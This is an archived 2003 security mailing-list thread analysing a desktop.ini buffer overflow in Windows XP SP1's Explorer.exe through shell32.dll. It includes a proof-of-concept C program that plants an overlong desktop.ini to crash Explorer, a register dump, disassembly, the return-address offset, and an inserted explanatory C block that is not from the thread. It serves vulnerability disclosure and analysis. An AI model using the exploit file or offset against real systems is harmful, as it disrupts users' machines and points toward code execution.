Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1

From: Executable Security (exurityat_private)
Date: Sun May 11 2003 - 01:28:54 PDT


    Hi, there:
    
    We were able to duplicate what was reported by Kristopher Matthews and aT4r
    InsaN3. Actually, if you have the following test scenario:
    
    File/Dir                    Explanation
    C:\
    C:\temp\desktop.ini         Overflowing text file
    C:\test                     directory
    
    The c:\temp\desktop.ini is the buffer-overflowing text file. Then, it
    crashes not only Explorer.exe, but also Internet Explorer.exe, and
    application programs (it crashed UltraEdit) that use the file-open dialog box
    when trying to scan the c:\ hard drive. However, you can do the following safely
    from a DOS prompt for the directory c:\test
    
    Explorer c:\test
    
    Of course, you cannot browse C:\test from the Explorer.exe GUI starting with
    C:\ root directory because of the overflowing c:\temp\desktop.ini file.
    Actually, I assume the overflowing file, no matter where it is located in
    the subdirectory, will crash the Explorer.exe starting with any directory
    higher above the overflowing desktop.ini file. (did not fully test though).
    
    Down to the assembly level, this bug lies in the shell32.dll file as such:
    
    7740F3C3                 lea     eax, [ebp-21Ch]        ; full path to the filename \desktop.in
    7740F3C9                 push    eax
    7740F3CA                 push    800h                   ; should be 400h I believe
    7740F3CF                 lea     eax, [ebp-0A1Ch]
    7740F3D5                 push    eax
    7740F3D6                 push    offset a_shellclassinf ; ".ShellClassInfo"
    7740F3DB                 call    ds:GetPrivateProfileSectionW
    
    When GetPrivateProfileSectionW is called, it assumes the buffer to be as
    large as twice 800h. As you can see, the local buffer is only A1C -
    21C = 800H for this string. So it overflows if the desktop.ini contains a
    long string. MSDN documents the third parameter of GetPrivateProfileSection
    as follows:
    
    nSize
    Specifies the size, in characters, of the buffer pointed to by the
    lpReturnedString parameter.
    
    To be precise, the buffer overflowing structure for this bug is such:
    
    | --------------------- A1C ---------| EBP | RET | -----------------> higher address
    
    The replaceable RET address is located at (A1C+4)/2 = 510.
    
    Due to the size limitation set by the 800H as well as the fact that the
    overflowing string is converted to Unicode, the chance of executing
    malicious code (Unicode exploit code as well as an exploitable RET address) is
    very limited. That is the reason we are documenting it in detail here.
    
    We do not know how this bug affects shell32.dll files on other Windows
    versions.
    
    With due credits to those who wrote the emails quoted below.
    
    Peter Huang
    http://members.rogers.com/exurity/
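To make the nSize arithmetic from the shell32.dll analysis above concrete, here is an added C example (not code from the thread, from shell32.dll or from Microsoft) that counts the WCHARs GetPrivateProfileSectionW would produce for a desktop.ini's [.ShellClassInfo] section and checks that against the 0x800-byte stack buffer, both with the nSize the listing passes (0x800) and with the corrected value (0x400). The buffer size and nSize constants come from the listing; the truncation model (at most nSize WCHARs written) is an assumption, and every desktop.ini sample is constructed.

```c
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

/* shell32.dll stack buffer [ebp-0A1Ch]..[ebp-21Ch]: 0x800 bytes = 0x400 WCHARs.
 * The vulnerable call passes nSize = 0x800, which the API counts in WCHARs. */
#define LOCAL_BUF_BYTES 0x800
#define WCHAR_BYTES     2
#define SECTION_HDR     "[.ShellClassInfo]"
/* WCHARs GetPrivateProfileSectionW emits for [.ShellClassInfo]: each non-empty
 * line + NUL, then one closing NUL. Assumes ANSI input; 0 if section absent. */
size_t shellclassinfo_wchars(const char *ini)
{
    size_t total = 0;
    bool in_section = false, found = false;
    for (const char *p = ini; *p; ) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len && p[len - 1] == '\r') len--;            /* tolerate CRLF */
        if (len && p[0] == '[') {
            in_section = len == strlen(SECTION_HDR) && memcmp(p, SECTION_HDR, len) == 0;
            found = found || in_section;
        } else if (in_section && len) {
            total += len + 1;                            /* entry + its NUL */
        }
        if (!eol) break;
        p = eol + 1;
    }
    return found ? total + 1 : 0;                        /* closing NUL */
}
/* Assumed model: the API writes at most nSize WCHARs (truncating the rest), so
 * the stack is overrun once min(needed, nSize) * sizeof(WCHAR) > buffer size. */
bool section_overruns(const char *ini, size_t nsize_passed, size_t buf_bytes)
{
    size_t needed = shellclassinfo_wchars(ini);
    return (needed < nsize_passed ? needed : nsize_passed) * WCHAR_BYTES > buf_bytes;
}
/* Constructed sample shaped like the thread's PoC (header plus n_a 'A's),
 * checked against the real 0x800-byte buffer with the nSize given. */
bool poc_style_overruns(size_t n_a, size_t nsize_passed)
{
    size_t hdr = strlen(SECTION_HDR) + 1;                /* header + '\n' */
    char *ini = malloc(hdr + n_a + 1);
    if (!ini) return false;
    memcpy(ini, SECTION_HDR "\n", hdr);
    memset(ini + hdr, 'A', n_a);
    ini[hdr + n_a] = '\0';
    bool r = section_overruns(ini, nsize_passed, LOCAL_BUF_BYTES);
    free(ini);
    return r;
}
```

With nSize corrected to 0x400 the same 2300-byte file no longer overruns, which is exactly the "should be 400h" remark in the listing.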
    
    -----Original Message-----
    From: Kristopher Matthews [mailto:krismat_private]
    Sent: Friday, May 09, 2003 11:43 AM
    To: 'Ryan Yagatich'
    Cc: vuln-devat_private
    Subject: RE: Buffer overflow in Explorer.exe
    
    I have tested and duplicated this behavior on a fully patched/updated
    Windows XP Pro system.
    
    1. The overflow is for that particular key, AFAICT.
    1a. It will not work for the root (c:/) directory; explorer.exe does not
    parse 'desktop.ini' for that directory. It will, however, work for any other
    directory.
    2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It
    looks for all the world like a standard buffer overflow; I believe a more
    carefully crafted 'desktop.ini' file could be cause for explorer.exe to
    unintentionally execute arbitrary code.
    3. Download and execute untrusted code? Combine this with any of the other
    popular exploits for Windows; also, it wouldn't be terribly hard to get a
    user to download a 'desktop.ini' file to their "My Documents" directory (in
    the guise of, say, a folder theme, which Windows does support; e.g.
    different background, file layout, etc.); bam, whenever they open that
    directory, explorer crashes.
    
    Regards,
    Kristopher
    
    
    -----Original Message-----
    From: Ryan Yagatich [mailto:ryanyat_private]
    Sent: Thursday, May 08, 2003 6:28 PM
    To: at4rat_private
    Cc: vuln-devat_private
    
    Hi,
            I don't quite understand the purpose behind this code. It creates
    a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the
    contents of
    
    [.ShellClassInfo]
    AAAAAAAAAAAA {x2301}
    
    
            And then terminates? I don't have a windows machine available to
    really explore this any, but what makes that entry in desktop.ini cause
    this? Furthermore, is this issue only for that particular key or is it
    generally just key/excessive parameter/missing value size that is
    affected? And additionally, you mention that explorer will no longer be
    able to operate when trying to browse the hard disk, but does this mean
    globally, or when they try to browse the c:/ drive, or just that
    particular folder?
            Please send me more information about this, (even if it references
    past posts that I have missed) so that I can better understand the
    severity of this. Especially since to me, I still see it as someone needing
    to download and execute untrusted software which causes a system crash,
    and if that were going to happen there are far worse things that can be
    done besides creating a small text file.
    
    Thanks,
    Ryan Yagatich
    
    
    ,_____________________________________________________,
    \ Ryan Yagatich                     supportat_private \
    / Pantek Incorporated                  (877) LINUX-FIX /
    \ http://www.pantek.com/security        (440) 519-1802 \
    /       Are your networks secure? Are you certain?     /
    \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\
    
    On Wed, 7 May 2003, aT4r InsaN3 wrote:
    
    >This bug allows a malicious attacker to execute data with privileges of a
    >user that is browsing the hard disk with explorer.
    >
    >tested against winxp SP1
    >
    >example code provided.
    >
    <snip>
    >
    >       strcpy(path,"\\aT4r[at]3WDesign.es Security");
    >       mkdir(path);
    >       SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
    >
    >       strcat(path,"\\desktop.ini");
    
    >       bof=fopen(path,"w");
    >       fputs("[.ShellClassInfo]\n",bof);
    >       memset(evil,'A',BUFF);
    >       fputs(evil,bof);
    >       fclose(bof);
    <snip>
    
    -----Original Message-----
    From: aT4r InsaN3 [mailto:at4rat_private]
    Sent: Wednesday, May 07, 2003 3:54 PM
    To: vuln-devat_private
    Subject: Buffer overflow in Explorer.exe
    
    This bug allows a malicious attacker to execute data with privileges of a
    user that is browsing the hard disk with explorer.
    
    tested against winxp SP1
    
    example code provided.
    
    
    /*
    
            Buffer Overflow in explorer.exe - Proof of Concept
            Tested only against: Windows XP SP1
    
            Found by aT4rat_private
    
            Greetings to:
            - #Haxorcitos@efnet= { "Tarako", "Croulder", "Drakar" , "[back]", "tyr" }:
            - #localhost and #darknet
    
    
            Usage: just execute this file.
                    This code will crash your explorer every time you try to browse your harddisk
                    execute this program again to delete the evil file ;-)
    
            (3ec.464): Access violation - code c0000005 (first chance)
            First chance exceptions are reported before any exception handling.
            This exception may be expected and handled.
            eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70 edi=000ece90
            eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0         nv up ei pl zr na po nc
            cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
            00410041 ??               ???
    
            3W Design Security 2003.        http://www.3WDesign.es/
    */
    
    
    #include <direct.h>
    #include <stdio.h>
    #include <stdlib.h>     /* exit() */
    #include <string.h>     /* strcpy(), strcat(), memset() */
    #include <windows.h>
    #include <sys/stat.h>
    
    #define BUFF 2300
    int main(void){
    
            char path[256];
            char evil[BUFF+1]="";
            FILE *bof;
            struct stat st;
            printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... .. .\n . .. ...: \tProof of Concept (aT4rat_private)\t:... .. .\n\n");
            strcpy(path,"\\aT4r[at]3WDesign.es Security");
            mkdir(path);
            SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
    
            strcat(path,"\\desktop.ini");
            if (stat(path,&st)==0)
                    { remove(path); exit(1);}//just execute this program twice to remove this file :P
            bof=fopen(path,"w");
            if (bof==NULL) { perror("fopen"); return 1; }
            fputs("[.ShellClassInfo]\n",bof);      /* the section explorer.exe parses */
            memset(evil,'A',BUFF);                /* BUFF bytes of 'A'; evil[BUFF] stays '\0' */
            fputs(evil,bof);
            fclose(bof);
            printf("evil file: %s Created. Try to browse your Harddisk O:-)\n",path);
    
            return 0;
    }
    
    



    This archive was generated by hypermail 2b30 : Tue May 13 2003 - 10:04:02 PDT